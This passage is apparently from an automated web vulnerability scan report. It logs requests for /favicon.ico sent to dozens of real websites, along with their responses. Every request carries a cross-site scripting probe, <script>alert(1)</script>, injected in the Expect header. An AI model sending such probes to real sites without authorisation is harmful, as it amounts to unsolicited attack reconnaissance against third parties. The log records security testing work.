Date: Wed, 04 May 2011 01:13:18 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.255. http://www.redentine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redentine.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.redentine.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 01:49:56 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=10
X-Powered-By: PHP/5.3.3
Content-Length: 310

<html><head></head><body><iframe frameborder="0" scrolling="no" src="http://areasnap.com/?keywords=www.redentine.com" width="100%" height="800"><p>Your browser does not support iframes, please click <
...[SNIP]...

29.256. http://www.reflector.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reflector.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reflector.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 03:29:09 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Content-Length: 169
Vary: Accept-Encoding

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

29.257. http://www.reivisa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reivisa.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reivisa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1421
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:06:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>REI Visa Credit Card</title>

       <meta http-equiv="Cache-Control" content="max-age=0">
       <meta http-equiv="C
...[SNIP]...

29.258. http://www.remtek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.remtek.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.remtek.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:00:48 GMT
Server: REMTEK/1.0
Content-Type: text/html
Content-Length: 1908

<html>
<head>
   <title>REMTEK</title>
   <link type="text/css" rel="stylesheet" href="remtek/images/style.css">
</head>        

<body>

<img src="remtek/images/remtek.gif" alt="REMTEK">
<center><table width=
...[SNIP]...

29.259. http://www.reservebranson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reservebranson.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reservebranson.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:39:20 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.260. http://www.restaurantrow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.restaurantrow.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.restaurantrow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 29823
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:32:37 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Missing Page : RestaurantRow.com</title>
<meta http-equiv="imagetoolbar" conte
...[SNIP]...

29.261. http://www.rewarddeliverycenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rewarddeliverycenter.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rewarddeliverycenter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 01:31:20 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>

29.262. http://www.rmatrackr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rmatrackr.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rmatrackr.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:06:51 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.263. http://www.runningwarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.runningwarehouse.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.runningwarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:28:22 GMT
Server: 4D_WebSTAR_S/5.4.0 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Tue, 21 Feb 2006 00:05:45 GMT
Content-Length: 3638
Content-Type: text/html

..............h...&... ..............(....... ...........@...........................~~......>=@...!.........[Z].....nmp.............,+/.MLO.....dcf.........437...........
.wvy.....FEH.............$#
...[SNIP]...

29.264. http://www.saclibrary.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saclibrary.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.saclibrary.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:44:56 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.265. http://www.sanjeevkapoor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sanjeevkapoor.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sanjeevkapoor.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:33:59 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.266. http://www.sarcoinc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sarcoinc.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sarcoinc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 04 May 2011 01:12:41 GMT
Content-Length: 243

<html><body style="margin: 0"><script type="text/javascript">document.write('<iframe style="width: 100%; height: 100%; border: 0;" src="http://searchmagnified.com/?dn=' + location.hostname + '&pid=7PO
...[SNIP]...

29.267. http://www.sccommed.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sccommed.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sccommed.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:42:38 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.268. http://www.scjohnson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scjohnson.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scjohnson.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: Web02
Date: Wed, 04 May 2011 03:17:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.269. http://www.screamindailydeals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.screamindailydeals.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.screamindailydeals.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:34:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.270. http://www.seaeagle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seaeagle.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.seaeagle.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:33:15 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.271. http://www.sheezyart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheezyart.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sheezyart.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.2
Content-type: text/html
Connection: close
Date: Wed, 04 May 2011 03:27:15 GMT
Server: lighttpd/1.4.26
Content-Length: 856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <title>You
...[SNIP]...

29.272. http://www.sheishairy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheishairy.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sheishairy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 01:14:43 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.273. http://www.shoppinglifestyle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoppinglifestyle.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shoppinglifestyle.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1855
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:27:29 GMT

<html><head>
<title>ShoppingLifestyle&reg; - Page not found</title>
<meta http-equiv="REFRESH" content="0;url=http://www.shoppinglifestyle.com/?hop=1">
<SCRIPT LANGUAGE="JavaScript">
function open
...[SNIP]...

29.274. http://www.sibcycline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sibcycline.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sibcycline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:20:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.275. http://www.silobreaker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silobreaker.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.silobreaker.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:13:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.276. http://www.sinclairinstitute.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sinclairinstitute.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sinclairinstitute.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Content-Length: 75
Vary: Accept-Encoding
Date: Wed, 04 May 2011 03:40:19 GMT
Connection: close

The page cannot be displayed because an internal server error has occurred.

29.277. http://www.sitewit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sitewit.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sitewit.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:22:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.278. http://www.slb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slb.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.slb.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:16:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.279. http://www.socialdiligence.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialdiligence.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.socialdiligence.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.5.7
Date: Wed, 04 May 2011 00:59:08 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.5.7</center>
</body>
</html>

29.280. http://www.soloqueens.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soloqueens.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.soloqueens.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Wed, 04 May 2011 01:04:40 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Keep-Alive: timeout=30
Vary: Accept-Encoding

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

29.281. http://www.sonichealthcareusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonichealthcareusa.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sonichealthcareusa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:12:59 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.282. http://www.speeddateunsub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.speeddateunsub.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.speeddateunsub.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 /favicon.ico
Server: Apache-Coyote/1.1
ETag: W/"244-1196720060000"
Last-Modified: Mon, 03 Dec 2007 22:14:20 GMT
Content-Type: text/html
Content-Length: 244
Date: Wed, 04 May 2011 02:22:58 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
       "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Error - Page Not Found</title>
</head>
<body>
<strong>The page you reques
...[SNIP]...

29.283. http://www.ssssssssss.in/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ssssssssss.in
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ssssssssss.in
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


29.284. http://www.startexpower.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.startexpower.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.startexpower.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:12:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.285. http://www.stoplosspay.army.mil/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stoplosspay.army.mil
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stoplosspay.army.mil
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Content-Length: 322
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:05:57 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
</head>
<script type="text/javascript">
function redirectToHttps()
{
var httpURL = window.location.hostname+window.location
...[SNIP]...

29.286. http://www.stratfordfestival.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stratfordfestival.ca
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stratfordfestival.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Expires: Fri, 15 Jul 2016 13:27:45 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:09:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.287. http://www.strausnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.strausnews.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.strausnews.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Wed, 04 May 2011 01:46:22 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: strausnews.com
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.288. http://www.systweak.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.systweak.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.systweak.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:46:35 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.289. http://www.tabletpcreview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tabletpcreview.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tabletpcreview.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:32:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.290. http://www.taragana.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.taragana.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.taragana.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Server: nginx/0.6.39
Date: Wed, 04 May 2011 01:04:26 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/0.6.39</center>
</body>
</html>

29.291. http://www.teen-college-girls.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teen-college-girls.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teen-college-girls.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.9.2
Date: Wed, 04 May 2011 00:03:11 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.9.2</center>
</body>
</html>

29.292. http://www.thegrocerygame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thegrocerygame.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thegrocerygame.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
ETag: ""
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:34:58 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.293. http://www.thegroveataltaridge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thegroveataltaridge.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thegroveataltaridge.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:21:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.294. http://www.therapeuticresearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therapeuticresearch.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.therapeuticresearch.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:23:12 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.295. http://www.thetinytube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thetinytube.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
